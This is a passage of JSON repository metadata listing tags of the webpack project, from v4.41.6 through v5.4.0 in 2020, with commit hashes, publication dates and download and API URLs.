9.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.4.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.4.0/manifests"},{"name":"v5.3.2","sha":"3df96f4a7843ef07794c31da8c7469dff133a228","kind":"tag","published_at":"2020-10-29T19:52:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.3.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.3.2/manifests"},{"name":"v5.3.1","sha":"dfae6f0ac70e1f4ec6d25a853838d4aa58e10e1f","kind":"tag","published_at":"2020-10-28T21:07:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.3.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.3.1/manifests"},{"name":"v5.3.0","sha":"ab555844701209492debf23cc3168a0efafb3251","kind":"tag","published_at":"2020-10-27T11:52:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.3.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.3.0/manifests"},{"name":"v5.2.1","sha":"d09357b4008da750e0d90066b2cd9567edc27a61","kind":"tag","published_at":"2020-10-27T11:02:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.2.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.2.1/manifests"},{"name":"v5.2.0","sha":"d42705c05dd62d562b759fb518f86c9854435df4","kind":"tag","published_at":"2020-10-22T16:59:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.2.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.2.0/manifests"},{"name":"v5.1.3","sha":"c90dfadbc6c5ac1ab4bda2cc106958b65fb5e6e7","kind":"tag","published_at":"2020-10-16T13:36:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.1.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.3/manifests"},{"name":"v5.1.2","sha":"83790375529c5b2967d45ed40700399e107d478f","kind":"tag","published_at":"2020-10-15T18:41:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.1.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.2/manifests"},{"name":"v5.1.1","sha":"f2f998b58362d5edc9945a48f8245a3347ad007c","kind":"tag","published_at":"2020-10-15T13:08:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.1.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.1/manifests"},{"name":"v5.1.0","sha":"77329b4d0e1aa35e26d8a32b2a8968a824b5de9c","kind":"tag","published_at":"2020-10-13T12:37:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.1.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.0/manifests"},{"name":"v5.0.0","sha":"610f36817af1f1c6929786d68f734ac582af1757","kind":"tag","published_at":"2020-10-10T20:07:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0/manifests"},{"name":"v5.0.0-rc.6","sha":"75ecff262ef0c1953e0d13c0b6a06bdad7ccace5","kind":"tag","published_at":"2020-10-10T19:03:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.6","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.6/manifests"},{"name":"v5.0.0-rc.5","sha":"57b493f6ff0bd55dddfbfc7ffc2f2680a7f82a6d","kind":"tag","published_at":"2020-10-09T22:38:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.5","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.5/manifests"},{"name":"v5.0.0-rc.4","sha":"1755fe30224943bca80e14634b4cf3f876e529ef","kind":"tag","published_at":"2020-10-07T08:49:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.4/manifests"},{"name":"v5.0.0-rc.3","sha":"ef38f322a963034271b76258beed35239760f526","kind":"tag","published_at":"2020-09-30T08:48:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.3/manifests"},{"name":"v5.0.0-rc.2","sha":"d49b49ddebc6c06703e19ff6391915d2b09b0f2b","kind":"tag","published_at":"2020-09-29T18:49:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.2/manifests"},{"name":"v5.0.0-rc.1","sha":"f60db1a079c7df48400637c54c547c161ed189da","kind":"tag","published_at":"2020-09-28T19:18:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.1/manifests"},{"name":"v5.0.0-rc.0","sha":"658209c253287de9edee85293d23123d5183a873","kind":"tag","published_at":"2020-09-20T21:11:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.0/manifests"},{"name":"v5.0.0-beta.33","sha":"dd3ec4f8072605479410ee7c13cb7a12688939d1","kind":"tag","published_at":"2020-09-20T21:10:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.33","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.33","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.33","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.33","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.33/manifests"},{"name":"v5.0.0-beta.32","sha":"e81882adb2ca1a3cceb3dc28d4f73c09f013eb83","kind":"tag","published_at":"2020-09-18T18:08:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.32","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.32","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.32","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.32","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.32/manifests"},{"name":"v4.44.2","sha":"2efeb4b5787e868e69233aa9dec469c200fa3b2c","kind":"tag","published_at":"2020-09-17T23:43:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.44.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.44.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.44.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.44.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.44.2/manifests"},{"name":"v5.0.0-beta.31","sha":"ea492a530f83b35346986c374f8394814f187eb8","kind":"tag","published_at":"2020-09-17T13:43:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.31","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.31","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.31","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.31","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.31/manifests"},{"name":"v5.0.0-beta.30","sha":"922c95e9b458e44b999aca2c45d9540079a225b2","kind":"tag","published_at":"2020-09-11T21:55:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.30","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.30","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.30","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.30","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.30/manifests"},{"name":"v5.0.0-beta.29","sha":"7bc3a031996d17d859d7a5b077ce1c5ab5dc7e29","kind":"tag","published_at":"2020-08-28T19:21:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.29","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.29","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.29","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.29","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.29/manifests"},{"name":"v5.0.0-beta.28","sha":"e32daa9be5fed184c8befac87216a88872f7df4a","kind":"tag","published_at":"2020-08-20T09:42:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.28","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.28","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.28","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.28","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.28/manifests"},{"name":"v5.0.0-beta.27","sha":"3cdff531d77ee63251a385e3b6e3ccca2ec37a64","kind":"tag","published_at":"2020-08-19T20:58:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.27","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.27","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.27","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.27","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.27/manifests"},{"name":"v5.0.0-beta.26","sha":"f2b68e0b77a3b4199c0d6989eeb69bd9a0bdb2ed","kind":"tag","published_at":"2020-08-14T19:06:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.26","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.26","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.26","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.26","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.26/manifests"},{"name":"v5.0.0-beta.25","sha":"377348be6c32895a3d440b3643963f71c730aa85","kind":"tag","published_at":"2020-08-10T14:13:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.25","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.25","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.25","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.25","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.25/manifests"},{"name":"v5.0.0-beta.24","sha":"bcc93305d8558285d30ea7142517491c3cdfd46c","kind":"tag","published_at":"2020-08-05T12:29:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.24","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.24","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.24","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.24","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.24/manifests"},{"name":"v5.0.0-beta.23","sha":"a14f073b358a9391dc70e791b6309adcdc21ec79","kind":"tag","published_at":"2020-08-02T05:08:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.23","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.23","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.23","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.23","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.23/manifests"},{"name":"v4.44.1","sha":"cd4af164784f3938353102179adfcbcf8f53949d","kind":"tag","published_at":"2020-07-30T08:02:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.44.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.44.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.44.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.44.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.44.1/manifests"},{"name":"v4.44.0","sha":"d4603c6d7ef4acfbe956ef49d8476c7368526989","kind":"tag","published_at":"2020-07-24T17:13:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.44.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.44.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.44.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.44.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.44.0/manifests"},{"name":"v5.0.0-beta.22","sha":"00226ff3de02078c641ef0426a5425c184510b8a","kind":"tag","published_at":"2020-07-09T11:51:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.22","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.22","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.22","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.22","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.22/manifests"},{"name":"v5.0.0-beta.21","sha":"20ba3c07803a3fd580755937016f0d5c85c1ccd3","kind":"tag","published_at":"2020-07-06T21:18:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.21","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.21","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.21","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.21","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.21/manifests"},{"name":"v5.0.0-beta.20","sha":"8efea230e05561fbaf3f9872e01affcac399cb3a","kind":"tag","published_at":"2020-06-29T16:29:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.20","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.20","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.20","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.20","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.20/manifests"},{"name":"v5.0.0-beta.19","sha":"3347fa1cee621c7f684b25507fdaed3264e8dcd9","kind":"tag","published_at":"2020-06-29T15:19:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.19","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.19","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.19","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.19","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.19/manifests"},{"name":"v5.0.0-beta.18","sha":"5c9fdeb9e1158a45de2350a7e858f550d73adf55","kind":"tag","published_at":"2020-06-17T23:25:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.18","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.18","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.18","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.18","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.18/manifests"},{"name":"v5.0.0-beta.17","sha":"a0716cf6bc074ec0d21fe72120cda103dabf8f9a","kind":"tag","published_at":"2020-06-03T07:21:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.17","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.17","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.17","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.17","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.17/manifests"},{"name":"v5.0.0-beta.16","sha":"b7f08b42b85f89e52facac426251d26ec64f2e6d","kind":"tag","published_at":"2020-05-05T22:03:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.16","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.16","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.16","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.16","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.16/manifests"},{"name":"v4.43.0","sha":"c9d4ff7b054fc581c96ce0e53432d44f9dd8ca72","kind":"tag","published_at":"2020-04-21T14:24:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.43.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.43.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.43.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.43.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.43.0/manifests"},{"name":"v5.0.0-beta.15","sha":"4c7e5e667bd30affa2e8c3bc8c65fd38e90912fe","kind":"tag","published_at":"2020-04-21T12:06:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.15","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.15/manifests"},{"name":"v4.42.1","sha":"71eb5931dbd7db125109a95692065333cea936a9","kind":"tag","published_at":"2020-03-24T06:23:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.42.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.42.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.42.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.42.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.42.1/manifests"},{"name":"v5.0.0-beta.14","sha":"59f8dc824ec169252476fa5b476e14c95f7bda40","kind":"tag","published_at":"2020-03-02T16:32:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.14","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.14/manifests"},{"name":"v4.42.0","sha":"29d851bf6d1e5d59eafb688d51396e70d12057c9","kind":"tag","published_at":"2020-03-02T08:41:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.42.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.42.0/manifests"},{"name":"v4.41.6","sha":"71be3bfa45a55aa8ea1b954ab1302565bb073bbc","kind":"tag","published_at":"2020-02-11T10:16:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.6","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.6/manifests"},{"name":"v5.0.0-beta.13","sha":"8445f06fa9abac1c98e6057af1c1fd2de63ba